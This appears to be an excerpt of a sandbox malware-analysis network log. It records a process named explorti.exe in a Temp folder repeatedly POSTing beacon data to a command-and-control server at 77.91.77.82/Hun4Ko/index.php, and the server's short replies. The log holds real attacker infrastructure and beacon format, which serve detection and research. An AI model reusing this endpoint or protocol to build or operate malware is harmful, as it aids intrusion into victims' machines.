                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:02.397227049 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:02 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            88192.168.2.46398077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:02.540443897 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            89192.168.2.46398177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:02.555408955 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:03.266819954 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            90192.168.2.46398277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:03.386481047 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:04.117705107 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:03 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            91192.168.2.46398377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:04.136152029 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:04.834445000 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:04 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            92192.168.2.46398477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:04.946177959 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:05.642798901 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:05 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            93192.168.2.46398577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:05.651972055 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:06.480652094 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:06 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            94192.168.2.46398677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:06.603885889 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:07.287729979 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            95192.168.2.46398777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:07.296675920 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:08.006805897 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            96192.168.2.46398877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:08.119498014 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            97192.168.2.46398977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:08.527192116 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:09.246932983 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            98192.168.2.46399077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:09.369040966 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:10.070054054 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            99192.168.2.46399177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:10.079788923 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:10.767721891 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            100192.168.2.46399277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:10.891338110 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:11.605792999 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            101192.168.2.46399377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:11.614543915 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:12.301615000 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            102192.168.2.46399477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:12.417850018 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:13.125245094 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            103192.168.2.46399577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:13.137666941 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:13.840404034 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            104192.168.2.46399677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:13.962313890 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:14.686316013 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            105192.168.2.46399777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:14.695549965 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:15.383233070 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            106192.168.2.46399877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:15.493052959 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:16.196491003 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            107192.168.2.46399977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:16.205892086 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:16.896295071 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            108192.168.2.46400077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:17.008712053 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            109192.168.2.46400177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:17.025542974 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:17.742522001 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            110192.168.2.46400277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:17.853326082 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:18.569547892 CEST219INHTTP/1.1 200 OK
